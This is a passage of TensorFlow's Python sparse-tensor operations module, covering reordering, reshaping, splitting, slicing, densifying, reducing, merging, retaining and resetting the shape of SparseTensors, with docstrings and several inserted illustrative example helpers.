Reordering does not affect the shape of the `SparseTensor`.
For example, if `sp_input` has shape `[4, 5]` and `indices` / `values`:
[0, 3]: b
[0, 1]: a
[3, 1]: d
[2, 0]: c
then the output will be a `SparseTensor` of shape `[4, 5]` and
`indices` / `values`:
[0, 1]: a
[0, 3]: b
[2, 0]: c
[3, 1]: d
Args:
sp_input: The input `SparseTensor`.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` with the same shape and non-empty values, but in
canonical ordering.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
reordered_ind, reordered_val = (
gen_sparse_ops.sparse_reorder(
sp_input.indices, sp_input.values, sp_input.dense_shape, name=name))
if sp_input.get_shape().is_fully_defined():
dense_shape = sp_input.get_shape().as_list()
else:
dense_shape = array_ops.identity(sp_input.dense_shape)
return sparse_tensor.SparseTensor(reordered_ind, reordered_val, dense_shape)
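# --- Editor's illustrative sketch (not part of the original module): builds
# --- the out-of-order SparseTensor from the `sparse_reorder` docstring and
# --- restores canonical row-major ordering. The helper name is hypothetical.
def _example_sparse_reorder_usage():
  """Reorders a manually constructed, out-of-order SparseTensor (sketch)."""
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 3], [0, 1], [3, 1], [2, 0]],
      values=[2.0, 1.0, 4.0, 3.0],
      dense_shape=[4, 5])
  # The result's indices are [[0, 1], [0, 3], [2, 0], [3, 1]] with the values
  # permuted accordingly; the dense shape is unchanged.
  return sparse_reorder(sp)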
@tf_export("sparse_reshape")
def sparse_reshape(sp_input, shape, name=None):
"""Reshapes a `SparseTensor` to represent values in a new dense shape.
This operation has the same semantics as `reshape` on the represented dense
tensor. The indices of non-empty values in `sp_input` are recomputed based
on the new dense shape, and a new `SparseTensor` is returned containing the
new indices and new shape. The order of non-empty values in `sp_input` is
unchanged.
If one component of `shape` is the special value -1, the size of that
dimension is computed so that the total dense size remains constant. At
most one component of `shape` can be -1. The number of dense elements
implied by `shape` must be the same as the number of dense elements
originally represented by `sp_input`.
For example, if `sp_input` has shape `[2, 3, 6]` and `indices` / `values`:
[0, 0, 0]: a
[0, 0, 1]: b
[0, 1, 0]: c
[1, 0, 0]: d
[1, 2, 3]: e
and `shape` is `[9, -1]`, then the output will be a `SparseTensor` of
shape `[9, 4]` and `indices` / `values`:
[0, 0]: a
[0, 1]: b
[1, 2]: c
[4, 2]: d
[8, 1]: e
Args:
sp_input: The input `SparseTensor`.
shape: A 1-D (vector) int64 `Tensor` specifying the new dense shape of the
represented `SparseTensor`.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` with the same non-empty values but with indices calculated
by the new dense shape.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
ValueError: If argument `shape` requests a `SparseTensor` with a different
number of elements than `sp_input`.
ValueError: If `shape` has more than one inferred (== -1) dimension.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
shape = math_ops.cast(shape, dtype=dtypes.int64)
with ops.name_scope(name, "SparseReshape", [sp_input]) as name:
reshaped_ind, reshaped_shape = gen_sparse_ops.sparse_reshape(
sp_input.indices, sp_input.dense_shape, shape, name=name)
reshaped_shape_const = tensor_util.constant_value(shape)
if (reshaped_shape_const is not None and
sp_input.get_shape().is_fully_defined()):
num_implied = sum((dim == -1) for dim in reshaped_shape_const)
if num_implied > 1:
raise ValueError("At most one dimension can be inferred (-1). Found: %s"
% reshaped_shape_const)
original_reshaped_shape = list(reshaped_shape_const) # Copy.
in_shape_size = np.prod(sp_input.get_shape().as_list())
if num_implied:
implied_idx = original_reshaped_shape.index(-1)
non_implied_idx = (
original_reshaped_shape[:implied_idx] +
original_reshaped_shape[implied_idx + 1:])
reshaped_shape_const[implied_idx] = (
in_shape_size // np.prod(non_implied_idx))
reshaped_size = np.prod(reshaped_shape_const)
if reshaped_size != in_shape_size:
raise ValueError("Cannot reshape a tensor with %d elements to shape %s "
"(%d elements)." %
(in_shape_size, original_reshaped_shape,
reshaped_size))
reshaped_shape = reshaped_shape_const
return sparse_tensor.SparseTensor(reshaped_ind,
array_ops.identity(sp_input.values),
reshaped_shape)
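# --- Editor's illustrative sketch (not part of the original module):
# --- reproduces the `sparse_reshape` docstring example, reshaping a
# --- [2, 3, 6] SparseTensor to [9, -1]. The helper name is hypothetical.
def _example_sparse_reshape_usage():
  """Reshapes a [2, 3, 6] SparseTensor to shape [9, 4] (sketch)."""
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]],
      values=[1.0, 2.0, 3.0, 4.0, 5.0],
      dense_shape=[2, 3, 6])
  # The -1 dimension is inferred as 4, so the result has dense shape [9, 4]
  # and indices [[0, 0], [0, 1], [1, 2], [4, 2], [8, 1]].
  return sparse_reshape(sp, [9, -1])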
# TODO(aselle): Remove keyword required once for 1.0 final
class KeywordRequired(object):
def __repr__(self):
# This is needed to make documentation without fully qualified module paths
return "KeywordRequired()"
@tf_export("sparse_split")
def sparse_split(keyword_required=KeywordRequired(),
sp_input=None,
num_split=None,
axis=None,
name=None,
split_dim=None):
"""Split a `SparseTensor` into `num_split` tensors along `axis`.
  If `sp_input.dense_shape[axis]` is not an integer multiple of `num_split`,
  each of the first `shape[axis] % num_split` slices gets one extra element
  along `axis`. For example, if `axis = 1` and `num_split = 2` and the
input is:
input_tensor = shape = [2, 7]
[ a d e ]
[b c ]
Graphically the output tensors are:
output_tensor[0] =
[ a ]
[b c ]
output_tensor[1] =
[ d e ]
[ ]
Args:
    keyword_required: Python 2 stand-in for * (temporary for argument reorder)
sp_input: The `SparseTensor` to split.
num_split: A Python integer. The number of ways to split.
axis: A 0-D `int32` `Tensor`. The dimension along which to split.
name: A name for the operation (optional).
split_dim: Deprecated old name for axis.
Returns:
`num_split` `SparseTensor` objects resulting from splitting `value`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
ValueError: If the deprecated `split_dim` and `axis` are both non None.
"""
if not isinstance(keyword_required, KeywordRequired):
raise ValueError("Keyword arguments are required for this function.")
if sp_input is None:
raise ValueError("sp_input is required")
if num_split is None:
raise ValueError("num_split is required")
if axis is None:
raise ValueError("axis is required")
axis = deprecation.deprecated_argument_lookup("axis", axis, "split_dim",
split_dim)
sp_input = _convert_to_sparse_tensor(sp_input)
output_inds, output_vals, output_shapes = (
gen_sparse_ops.sparse_split(
axis,
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
num_split,
name=name))
sparse_tensors = []
for i in range(0, num_split):
sparse_tensors.append(
sparse_tensor.SparseTensor(output_inds[i], output_vals[i],
output_shapes[i]))
return sparse_tensors
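# --- Editor's illustrative sketch (not part of the original module): splits
# --- the [2, 7] SparseTensor from the `sparse_split` docstring into two
# --- pieces along axis 1. The helper name is hypothetical.
def _example_sparse_split_usage():
  """Splits a [2, 7] SparseTensor into two SparseTensors along axis 1."""
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 2], [0, 4], [0, 5], [1, 0], [1, 1]],
      values=[1.0, 4.0, 5.0, 2.0, 3.0],
      dense_shape=[2, 7])
  # Since 7 % 2 == 1, the first output covers columns 0..3 and the second
  # covers columns 4..6; a list of two SparseTensors is returned.
  return sparse_split(sp_input=sp, num_split=2, axis=1)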
@tf_export("sparse_slice")
def sparse_slice(sp_input, start, size, name=None):
"""Slice a `SparseTensor` based on the `start` and `size.
For example, if the input is
input_tensor = shape = [2, 7]
[ a d e ]
[b c ]
Graphically the output tensors are:
sparse_slice([0, 0], [2, 4]) = shape = [2, 4]
[ a ]
[b c ]
sparse_slice([0, 4], [2, 3]) = shape = [2, 3]
[ d e ]
[ ]
Args:
sp_input: The `SparseTensor` to split.
    start: 1-D `Tensor` representing the start of the slice.
    size: 1-D `Tensor` representing the size of the slice.
name: A name for the operation (optional).
Returns:
    A `SparseTensor` object resulting from slicing.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
start = ops.convert_to_tensor(start, dtypes.int64)
size = ops.convert_to_tensor(size, dtypes.int64)
with ops.name_scope(name, "SparseSlice", [sp_input]) as name:
output_indices, output_values, output_shape = gen_sparse_ops.sparse_slice(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
start,
size,
name=name)
return sparse_tensor.SparseTensor(output_indices, output_values,
output_shape)
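# --- Editor's illustrative sketch (not part of the original module): slices
# --- the [2, 7] SparseTensor from the `sparse_slice` docstring, keeping
# --- columns 4..6 of both rows. The helper name is hypothetical.
def _example_sparse_slice_usage():
  """Slices columns [4, 7) out of a [2, 7] SparseTensor (sketch)."""
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 2], [0, 4], [0, 5], [1, 0], [1, 1]],
      values=[1.0, 4.0, 5.0, 2.0, 3.0],
      dense_shape=[2, 7])
  # The result has dense shape [2, 3] and keeps only the entries that were at
  # columns 4 and 5 of row 0.
  return sparse_slice(sp, start=[0, 4], size=[2, 3])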
@tf_export("sparse_to_dense")
def sparse_to_dense(sparse_indices,
output_shape,
sparse_values,
default_value=0,
validate_indices=True,
name=None):
"""Converts a sparse representation into a dense tensor.
Builds an array `dense` with shape `output_shape` such that
```python
# If sparse_indices is scalar
dense[i] = (i == sparse_indices ? sparse_values : default_value)
# If sparse_indices is a vector, then for each i
dense[sparse_indices[i]] = sparse_values[i]
# If sparse_indices is an n by d matrix, then for each i in [0, n)
dense[sparse_indices[i][0], ..., sparse_indices[i][d-1]] = sparse_values[i]
```
All other values in `dense` are set to `default_value`. If `sparse_values`
is a scalar, all sparse indices are set to this single value.
Indices should be sorted in lexicographic order, and indices must not
contain any repeats. If `validate_indices` is True, these properties
are checked during execution.
Args:
sparse_indices: A 0-D, 1-D, or 2-D `Tensor` of type `int32` or `int64`.
`sparse_indices[i]` contains the complete index where `sparse_values[i]`
will be placed.
output_shape: A 1-D `Tensor` of the same type as `sparse_indices`. Shape
of the dense output tensor.
sparse_values: A 0-D or 1-D `Tensor`. Values corresponding to each row of
`sparse_indices`, or a scalar value to be used for all sparse indices.
default_value: A 0-D `Tensor` of the same type as `sparse_values`. Value
to set for indices not specified in `sparse_indices`. Defaults to zero.
validate_indices: A boolean value. If True, indices are checked to make
sure they are sorted in lexicographic order and that there are no repeats.
name: A name for the operation (optional).
Returns:
Dense `Tensor` of shape `output_shape`. Has the same type as
`sparse_values`.
"""
return gen_sparse_ops.sparse_to_dense(
sparse_indices,
output_shape,
sparse_values,
default_value=default_value,
validate_indices=validate_indices,
name=name)
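# --- Editor's illustrative sketch (not part of the original module): converts
# --- two scattered values into a dense [3, 4] tensor with `sparse_to_dense`.
# --- The helper name is hypothetical.
def _example_sparse_to_dense_usage():
  """Builds a dense [3, 4] tensor with 5 at [0, 0] and 7 at [1, 2] (sketch)."""
  # All positions not listed in `sparse_indices` are filled with the
  # default_value of 0.
  return sparse_to_dense(
      sparse_indices=[[0, 0], [1, 2]],
      output_shape=[3, 4],
      sparse_values=[5, 7],
      default_value=0)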
@tf_export("sparse_reduce_max")
def sparse_reduce_max(sp_input, axis=None, keep_dims=False,
reduction_axes=None):
"""Computes the max of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_max()`. In particular, this Op also returns a dense `Tensor`
instead of a sparse one.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
similar to the indexing rules in Python.
For example:
```python
# 'x' represents [[1, ?, 2]
# [?, 3, ?]]
# where ? is implicitly-zero.
tf.sparse_reduce_max(x) ==> 3
tf.sparse_reduce_max(x, 0) ==> [1, 3, 2]
tf.sparse_reduce_max(x, 1) ==> [2, 3] # Can also use -1 as the axis.
tf.sparse_reduce_max(x, 1, keep_dims=True) ==> [[2], [3]]
tf.sparse_reduce_max(x, [0, 1]) ==> 3
```
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis.
Returns:
The reduced Tensor.
"""
return gen_sparse_ops.sparse_reduce_max(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims)
@tf_export("sparse_reduce_max_sparse")
def sparse_reduce_max_sparse(sp_input,
axis=None,
keep_dims=False,
reduction_axes=None):
"""Computes the max of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_max()`. In contrast to SparseReduceSum, this Op returns a
SparseTensor.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
which are interpreted according to the indexing rules in Python.
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis
Returns:
The reduced SparseTensor.
"""
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_reduce_max_sparse(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_reduce_sum")
def sparse_reduce_sum(sp_input, axis=None, keep_dims=False,
reduction_axes=None):
"""Computes the sum of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_sum()`. In particular, this Op also returns a dense `Tensor`
instead of a sparse one.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
similar to the indexing rules in Python.
For example:
```python
# 'x' represents [[1, ?, 1]
# [?, 1, ?]]
# where ? is implicitly-zero.
tf.sparse_reduce_sum(x) ==> 3
tf.sparse_reduce_sum(x, 0) ==> [1, 1, 1]
tf.sparse_reduce_sum(x, 1) ==> [2, 1] # Can also use -1 as the axis.
tf.sparse_reduce_sum(x, 1, keep_dims=True) ==> [[2], [1]]
tf.sparse_reduce_sum(x, [0, 1]) ==> 3
```
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis.
Returns:
The reduced Tensor.
"""
return gen_sparse_ops.sparse_reduce_sum(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims)
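# --- Editor's illustrative sketch (not part of the original module):
# --- reproduces the `sparse_reduce_sum` docstring example for the implicitly
# --- zero matrix [[1, ?, 1], [?, 1, ?]]. The helper name is hypothetical.
def _example_sparse_reduce_sum_usage():
  """Computes full and per-row sums of a sparse [2, 3] matrix (sketch)."""
  x = sparse_tensor.SparseTensor(
      indices=[[0, 0], [0, 2], [1, 1]], values=[1, 1, 1], dense_shape=[2, 3])
  total = sparse_reduce_sum(x)                        # ==> 3
  per_row = sparse_reduce_sum(x, 1, keep_dims=True)   # ==> [[2], [1]]
  return total, per_row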
@tf_export("sparse_reduce_sum_sparse")
def sparse_reduce_sum_sparse(sp_input,
axis=None,
keep_dims=False,
reduction_axes=None):
"""Computes the sum of elements across dimensions of a SparseTensor.
This Op takes a SparseTensor and is the sparse counterpart to
`tf.reduce_sum()`. In contrast to SparseReduceSum, this Op returns a
SparseTensor.
Reduces `sp_input` along the dimensions given in `reduction_axes`. Unless
`keep_dims` is true, the rank of the tensor is reduced by 1 for each entry in
`reduction_axes`. If `keep_dims` is true, the reduced dimensions are retained
with length 1.
If `reduction_axes` has no entries, all dimensions are reduced, and a tensor
with a single element is returned. Additionally, the axes can be negative,
which are interpreted according to the indexing rules in Python.
Args:
sp_input: The SparseTensor to reduce. Should have numeric type.
axis: The dimensions to reduce; list or scalar. If `None` (the
default), reduces all dimensions.
keep_dims: If true, retain reduced dimensions with length 1.
reduction_axes: Deprecated name of axis
Returns:
The reduced SparseTensor.
"""
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_reduce_sum_sparse(
sp_input.indices, sp_input.values, sp_input.dense_shape,
math_ops._ReductionDims(sp_input, axis, reduction_axes), keep_dims))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_tensor_to_dense")
def sparse_tensor_to_dense(sp_input,
default_value=0,
validate_indices=True,
name=None):
"""Converts a `SparseTensor` into a dense tensor.
This op is a convenience wrapper around `sparse_to_dense` for `SparseTensor`s.
For example, if `sp_input` has shape `[3, 5]` and non-empty string values:
[0, 1]: a
[0, 3]: b
[2, 0]: c
and `default_value` is `x`, then the output will be a dense `[3, 5]`
string tensor with values:
[[x a x b x]
[x x x x x]
[c x x x x]]
  Indices must not contain repeats; this is only checked if
  `validate_indices` is True.
Args:
sp_input: The input `SparseTensor`.
default_value: Scalar value to set for indices not specified in
`sp_input`. Defaults to zero.
validate_indices: A boolean value. If `True`, indices are checked to make
sure they are sorted in lexicographic order and that there are no repeats.
name: A name prefix for the returned tensors (optional).
Returns:
A dense tensor with shape `sp_input.dense_shape` and values specified by
the non-empty values in `sp_input`. Indices not in `sp_input` are assigned
`default_value`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return sparse_to_dense(
sp_input.indices,
sp_input.dense_shape,
sp_input.values,
default_value=default_value,
validate_indices=validate_indices,
name=name)
@tf_export("sparse_to_indicator")
def sparse_to_indicator(sp_input, vocab_size, name=None):
"""Converts a `SparseTensor` of ids into a dense bool indicator tensor.
The last dimension of `sp_input.indices` is discarded and replaced with
the values of `sp_input`. If `sp_input.dense_shape = [D0, D1, ..., Dn, K]`,
then `output.shape = [D0, D1, ..., Dn, vocab_size]`, where
output[d_0, d_1, ..., d_n, sp_input[d_0, d_1, ..., d_n, k]] = True
and False elsewhere in `output`.
For example, if `sp_input.dense_shape = [2, 3, 4]` with non-empty values:
[0, 0, 0]: 0
[0, 1, 0]: 10
[1, 0, 3]: 103
[1, 1, 2]: 150
[1, 1, 3]: 149
[1, 1, 4]: 150
[1, 2, 1]: 121
and `vocab_size = 200`, then the output will be a `[2, 3, 200]` dense bool
tensor with False everywhere except at positions
(0, 0, 0), (0, 1, 10), (1, 0, 103), (1, 1, 149), (1, 1, 150),
(1, 2, 121).
Note that repeats are allowed in the input SparseTensor.
This op is useful for converting `SparseTensor`s into dense formats for
compatibility with ops that expect dense tensors.
The input `SparseTensor` must be in row-major order.
Args:
sp_input: A `SparseTensor` with `values` property of type `int32` or
`int64`.
vocab_size: A scalar int64 Tensor (or Python int) containing the new size
of the last dimension, `all(0 <= sp_input.values < vocab_size)`.
name: A name prefix for the returned tensors (optional)
Returns:
A dense bool indicator tensor representing the indices with specified value.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
with ops.name_scope(name, "SparseToIndicator", [sp_input]) as name:
num_entries = array_ops.shape(sp_input.indices)[0]
new_values = array_ops.fill(array_ops.expand_dims(num_entries, 0), True)
sp_values = sparse_tensor.SparseTensor(sp_input.indices, new_values,
sp_input.dense_shape)
sp_new = sparse_merge(sp_input, sp_values, vocab_size, name)
# validate_indices may be False because we allow duplicates in new_indices:
# repeated indices are allowed when creating an indicator matrix.
return sparse_tensor_to_dense(
sp_new, default_value=False, validate_indices=False, name=name)
@tf_export("sparse_merge")
def sparse_merge(sp_ids, sp_values, vocab_size, name=None,
already_sorted=False):
"""Combines a batch of feature ids and values into a single `SparseTensor`.
The most common use case for this function occurs when feature ids and
their corresponding values are stored in `Example` protos on disk.
`parse_example` will return a batch of ids and a batch of values, and this
function joins them into a single logical `SparseTensor` for use in
functions such as `sparse_tensor_dense_matmul`, `sparse_to_dense`, etc.
The `SparseTensor` returned by this function has the following properties:
- `indices` is equivalent to `sp_ids.indices` with the last
dimension discarded and replaced with `sp_ids.values`.
- `values` is simply `sp_values.values`.
- If `sp_ids.dense_shape = [D0, D1, ..., Dn, K]`, then
`output.shape = [D0, D1, ..., Dn, vocab_size]`.
For example, consider the following feature vectors:
```python
vector1 = [-3, 0, 0, 0, 0, 0]
vector2 = [ 0, 1, 0, 4, 1, 0]
vector3 = [ 5, 0, 0, 9, 0, 0]
```
These might be stored sparsely in the following Example protos by storing
only the feature ids (column number if the vectors are treated as a matrix)
of the non-zero elements and the corresponding values:
```python
examples = [Example(features={
"ids": Feature(int64_list=Int64List(value=[0])),
"values": Feature(float_list=FloatList(value=[-3]))}),
Example(features={
"ids": Feature(int64_list=Int64List(value=[1, 4, 3])),
"values": Feature(float_list=FloatList(value=[1, 1, 4]))}),
Example(features={
"ids": Feature(int64_list=Int64List(value=[0, 3])),
"values": Feature(float_list=FloatList(value=[5, 9]))})]
```
The result of calling parse_example on these examples will produce a
dictionary with entries for "ids" and "values". Passing those two objects
to this function along with vocab_size=6, will produce a `SparseTensor` that
sparsely represents all three instances. Namely, the `indices` property will
contain the coordinates of the non-zero entries in the feature matrix (the
first dimension is the row number in the matrix, i.e., the index within the
batch, and the second dimension is the column number, i.e., the feature id);
`values` will contain the actual values. `shape` will be the shape of the
original matrix, i.e., (3, 6). For our example above, the output will be
equal to:
```python
SparseTensor(indices=[[0, 0], [1, 1], [1, 3], [1, 4], [2, 0], [2, 3]],
values=[-3, 1, 4, 1, 5, 9],
dense_shape=[3, 6])
```
This method generalizes to higher-dimensions by simply providing a list for
both the sp_ids as well as the vocab_size.
In this case the resulting `SparseTensor` has the following properties:
- `indices` is equivalent to `sp_ids[0].indices` with the last
dimension discarded and concatenated with
`sp_ids[0].values, sp_ids[1].values, ...`.
- `values` is simply `sp_values.values`.
- If `sp_ids.dense_shape = [D0, D1, ..., Dn, K]`, then
`output.shape = [D0, D1, ..., Dn] + vocab_size`.
Args:
    sp_ids: A single `SparseTensor` with `values` property of type `int32`
      or `int64`, or a Python list of such `SparseTensor`s.
sp_values: A `SparseTensor` of any type.
vocab_size: A scalar `int64` Tensor (or Python int) containing the new size
of the last dimension, `all(0 <= sp_ids.values < vocab_size)`.
Or a list thereof with `all(0 <= sp_ids[i].values < vocab_size[i])` for
all `i`.
name: A name prefix for the returned tensors (optional)
already_sorted: A boolean to specify whether the per-batch values in
`sp_values` are already sorted. If so skip sorting, False by default
(optional).
Returns:
A `SparseTensor` compactly representing a batch of feature ids and values,
useful for passing to functions that expect such a `SparseTensor`.
Raises:
    TypeError: If `sp_values` is not a `SparseTensor`. Or if `sp_ids` is neither
      a `SparseTensor` nor a list thereof. Or if `vocab_size` is not a
      `Tensor` or a Python int and `sp_ids` is a `SparseTensor`. Or if
      `vocab_size` is not a list of `Tensor`s or Python ints and `sp_ids` is a
      list.
ValueError: If `sp_ids` and `vocab_size` are lists of different lengths.
"""
if isinstance(sp_ids, sparse_tensor.SparseTensorValue) or isinstance(
sp_ids, sparse_tensor.SparseTensor):
sp_ids = [sp_ids]
if not (isinstance(vocab_size, ops.Tensor) or
isinstance(vocab_size, numbers.Integral)):
raise TypeError("vocab_size has to be a Tensor or Python int. Found %s" %
type(vocab_size))
vocab_size = [vocab_size]
else:
if not isinstance(sp_ids, collections.Iterable):
raise TypeError("sp_ids has to be a SparseTensor or list thereof. "
"Found %s" % type(sp_ids))
if not isinstance(vocab_size, collections.Iterable):
raise TypeError("vocab_size has to be a list of Tensors or Python ints. "
"Found %s" % type(vocab_size))
for dim in vocab_size:
if not (isinstance(dim, ops.Tensor) or isinstance(dim, numbers.Integral)):
raise TypeError(
"vocab_size has to be a list of Tensors or Python ints. Found %s" %
type(dim))
if len(sp_ids) != len(vocab_size):
raise ValueError("sp_ids and vocab_size have to have equal lengths.")
with ops.name_scope(name, "SparseMerge", [sp_ids, sp_values]):
sp_ids = [_convert_to_sparse_tensor(sp_ids_dim) for sp_ids_dim in sp_ids]
sp_values = _convert_to_sparse_tensor(sp_values)
ids = []
for sp_ids_dim in sp_ids:
ids_dim = sp_ids_dim.values
if sp_ids_dim.dtype != dtypes.int64:
ids_dim = math_ops.cast(ids_dim, dtypes.int64)
ids += [array_ops.expand_dims(ids_dim, axis=1)]
vocab_size = [math_ops.cast(x, dtypes.int64) for x in vocab_size]
# Slice off the last dimension of indices, then tack on the ids
indices_columns_to_preserve = sp_ids[0].indices[:, :-1]
new_indices = array_ops.concat([indices_columns_to_preserve] + ids, 1)
new_values = sp_values.values
new_shape = array_ops.concat([sp_ids[0].dense_shape[:-1], vocab_size], 0)
result = sparse_tensor.SparseTensor(new_indices, new_values, new_shape)
return result if already_sorted else sparse_reorder(result)
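# --- Editor's illustrative sketch (not part of the original module): merges
# --- the batched ids/values from the `sparse_merge` docstring into a single
# --- [3, 6] SparseTensor. The helper name is hypothetical.
def _example_sparse_merge_usage():
  """Merges feature ids and values into one [3, 6] SparseTensor (sketch)."""
  batched_indices = [[0, 0], [1, 0], [1, 1], [1, 2], [2, 0], [2, 1]]
  sp_ids = sparse_tensor.SparseTensor(
      indices=batched_indices, values=[0, 1, 4, 3, 0, 3], dense_shape=[3, 3])
  sp_values = sparse_tensor.SparseTensor(
      indices=batched_indices,
      values=[-3.0, 1.0, 1.0, 4.0, 5.0, 9.0],
      dense_shape=[3, 3])
  # The ids become column indices, so the result densifies to
  # [[-3, 0, 0, 0, 0, 0], [0, 1, 0, 4, 1, 0], [5, 0, 0, 9, 0, 0]].
  return sparse_merge(sp_ids, sp_values, vocab_size=6)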
@tf_export("sparse_retain")
def sparse_retain(sp_input, to_retain):
"""Retains specified non-empty values within a `SparseTensor`.
For example, if `sp_input` has shape `[4, 5]` and 4 non-empty string values:
[0, 1]: a
[0, 3]: b
[2, 0]: c
[3, 1]: d
and `to_retain = [True, False, False, True]`, then the output will
be a `SparseTensor` of shape `[4, 5]` with 2 non-empty values:
[0, 1]: a
[3, 1]: d
Args:
sp_input: The input `SparseTensor` with `N` non-empty elements.
to_retain: A bool vector of length `N` with `M` true values.
Returns:
A `SparseTensor` with the same shape as the input and `M` non-empty
elements corresponding to the true positions in `to_retain`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
to_retain = ops.convert_to_tensor(to_retain)
# Shape checking, if shape is known at graph construction time
retain_shape = to_retain.get_shape()
retain_shape.assert_has_rank(1)
sp_input.values.get_shape()[0].merge_with(retain_shape[0])
where_true = array_ops.reshape(array_ops.where(to_retain), [-1])
new_indices = array_ops.gather(sp_input.indices, where_true)
new_values = array_ops.gather(sp_input.values, where_true)
return sparse_tensor.SparseTensor(new_indices, new_values,
array_ops.identity(sp_input.dense_shape))
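# --- Editor's illustrative sketch (not part of the original module): keeps
# --- only the first and last non-empty values of a [4, 5] SparseTensor, as in
# --- the `sparse_retain` docstring. The helper name is hypothetical.
def _example_sparse_retain_usage():
  """Retains 2 of 4 non-empty values in a [4, 5] SparseTensor (sketch)."""
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 1], [0, 3], [2, 0], [3, 1]],
      values=[1.0, 2.0, 3.0, 4.0],
      dense_shape=[4, 5])
  # Only the entries at [0, 1] and [3, 1] survive; the dense shape stays [4, 5].
  return sparse_retain(sp, [True, False, False, True])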
@tf_export("sparse_reset_shape")
def sparse_reset_shape(sp_input, new_shape=None):
"""Resets the shape of a `SparseTensor` with indices and values unchanged.
If `new_shape` is None, returns a copy of `sp_input` with its shape reset
to the tight bounding box of `sp_input`. This will be a shape consisting of
all zeros if sp_input has no values.
If `new_shape` is provided, then it must be larger or equal in all dimensions
compared to the shape of `sp_input`. When this condition is met, the returned
SparseTensor will have its shape reset to `new_shape` and its indices and
  values unchanged from those of `sp_input`.
For example:
Consider a `sp_input` with shape [2, 3, 5]:
[0, 0, 1]: a
[0, 1, 0]: b
[0, 2, 2]: c
[1, 0, 3]: d
- It is an error to set `new_shape` as [3, 7] since this represents a
rank-2 tensor while `sp_input` is rank-3. This is either a ValueError
during graph construction (if both shapes are known) or an OpError during
run time.
- Setting `new_shape` as [2, 3, 6] will be fine as this shape is larger or
equal in every dimension compared to the original shape [2, 3, 5].
- On the other hand, setting new_shape as [2, 3, 4] is also an error: The
third dimension is smaller than the original shape [2, 3, 5] (and an
`InvalidArgumentError` will be raised).
- If `new_shape` is None, the returned SparseTensor will have a shape
[2, 3, 4], which is the tight bounding box of `sp_input`.
Args:
sp_input: The input `SparseTensor`.
new_shape: None or a vector representing the new shape for the returned
`SparseTensor`.
Returns:
    A `SparseTensor` with indices and values unchanged from `sp_input`. Its
      shape is `new_shape` if that is set. Otherwise it is the tight bounding
      box of `sp_input`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
ValueError: If `new_shape` represents a tensor with a different rank from
that of `sp_input` (if shapes are known when graph is constructed).
ValueError: If `new_shape` is determined during graph build to have
dimension sizes that are too small.
OpError:
- If `new_shape` has dimension sizes that are too small.
- If shapes are not known during graph construction time, and during run
time it is found out that the ranks do not match.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
in_indices = array_ops.identity(sp_input.indices)
in_values = array_ops.identity(sp_input.values)
in_shape = array_ops.identity(sp_input.dense_shape)
if new_shape is None:
dim_low_bound = math_ops.reduce_max(in_indices, axis=0)
